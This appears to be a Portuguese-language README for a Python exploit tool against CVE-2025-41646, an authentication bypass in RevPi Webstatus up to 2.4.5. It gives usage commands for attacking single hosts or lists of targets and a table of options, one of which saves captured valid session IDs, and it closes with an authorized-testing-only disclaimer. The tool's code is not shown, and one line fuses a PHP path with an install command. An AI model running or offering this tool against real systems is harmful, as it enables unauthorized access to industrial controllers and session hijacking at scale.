
Este é um script de exploit em Python3 para CVE-2025-41646, uma vulnerabilidade de Bypass de Autenticação que afeta RevPi Webstatus <= 2.4.5.
/php/dal.phppip install -r requirements.txt
requests
urllib3 (usually comes with requests)
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100"
python3 cve_2025_41646_auth_bypass.py -l targets.txt
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --proxy "http://127.0.0.1:8080"
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --silent
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --json
requisição/resposta
Esta ferramenta destina-se apenas a fins educacionais e de testes de penetração autorizados. O uso não autorizado contra sistemas sem permissão explícita é ilegal.
| Opção | Descrição |
|---|
-u, --url | URL do alvo (ex.: http://IP) |
-l, --list | Arquivo contendo a lista de alvos |
-o, --output | Arquivo de saída para salvar IDs de sessão válidos |
--proxy | Usar um proxy (http://127.0.0.1:8080) |
--json | Imprimir saída JSON bruta |
--silent | Modo silencioso (imprime apenas o ID da sessão) |